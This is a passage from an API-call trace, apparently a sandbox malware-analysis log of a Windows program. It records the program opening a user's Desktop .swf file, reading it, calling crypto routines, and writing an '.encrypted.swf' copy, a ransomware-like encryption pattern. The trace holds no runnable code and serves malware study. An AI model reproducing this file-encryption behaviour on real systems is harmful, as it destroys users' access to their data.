Flags=0x0, Size=0x4) returned 0x7da1f8 [0031.751] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0031.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0031.751] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0031.752] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.752] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0031.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0031.752] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0031.752] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da238 [0031.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0031.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9a8 [0031.752] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0031.752] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0031.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3b8 [0031.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da158 [0031.752] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0031.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0031.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0031.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da158 [0031.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0031.752] CryptDestroyHash (hHash=0x7c2100) returned 1 [0031.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0031.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0031.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0031.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0031.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898c8 [0031.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8897d8 [0031.752] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3b8 [0031.753] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0031.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2b8 [0031.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1dc8 [0031.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca48 [0031.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da378 [0031.753] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0031.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0031.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0031.753] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.753] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.753] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0031.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0031.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0031.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0031.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0031.753] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\n0tvrnehfm.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0031.753] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0031.753] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0031.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1788 [0031.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb50 [0031.753] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2a8 [0031.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0031.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0031.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0031.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0031.753] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0031.754] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0031.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0031.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0031.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0031.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0031.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0031.754] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2100 | out: hHeap=0x770000) returned 1 [0031.754] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0031.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0031.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0031.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0031.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0031.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da188 [0031.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da348 [0031.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0031.754] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0031.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0031.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd30 [0031.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0031.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0031.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0031.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0031.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0031.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889430 [0031.754] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0031.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0031.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da3e8 [0031.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0031.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0031.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0031.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5758 [0031.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0031.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0031.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd30 | out: hHeap=0x770000) returned 1 [0031.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5c40 [0031.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5758 | out: hHeap=0x770000) returned 1 [0031.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0031.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0031.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3e8 | out: hHeap=0x770000) returned 1 [0031.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0031.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0031.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb98 | out: hHeap=0x770000) returned 1 [0031.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0031.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5bb8 [0031.755] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni")) returned 0x10 [0031.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5bb8 | out: hHeap=0x770000) returned 1 [0031.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7d5c40 | out: hHeap=0x770000) returned 1 [0031.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0031.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0031.755] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0031.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2100 [0031.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0031.755] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0031.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0031.756] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tPM9533uYXhl8C6vtf\\tjNI\\n0TvRnehFM.encrypted.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tpm9533uyxhl8c6vtf\\tjni\\n0tvrnehfm.encrypted.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0031.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b18f0 [0031.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0031.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da348 [0031.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0031.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0031.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0031.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0031.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0031.756] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0031.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0031.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0031.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0031.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0031.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0031.756] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.756] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0031.756] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2200 [0031.756] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.756] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0031.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0031.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0031.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0031.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.757] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0031.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0031.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da228 [0031.757] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0031.757] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0031.757] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0xd984, lpOverlapped=0x0) returned 1 [0031.759] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0031.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0031.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.759] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0031.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.759] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd984) returned 0x955018 [0031.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0031.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0031.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0031.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0031.760] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da148 | out: hHeap=0x770000) returned 1 [0031.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0031.760] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd984) returned 0x88ffb0 [0031.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0031.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.762] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0031.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0031.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0031.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd984) returned 0x955018 [0031.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x955018 | out: hHeap=0x770000) returned 1 [0031.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889c10 | out: hHeap=0x770000) returned 1 [0031.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0031.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.762] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0031.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0031.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0031.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.762] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0031.762] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c22c0 [0031.762] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0031.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da228 [0031.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0031.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0031.763] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0031.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0031.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0031.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1aa8 [0031.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1b8 [0031.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1918 [0031.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889c10 [0031.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0031.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da3e8 [0031.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xd984) returned 0x955018 [0031.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0031.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1c8 [0031.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0031.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1a8 [0031.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0031.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da1a8 [0031.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0031.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0031.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0031.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7da2e8 [0031.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0031.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da208 [0031.763] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0031.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd30 [0031.763] RtlAllocateHeap 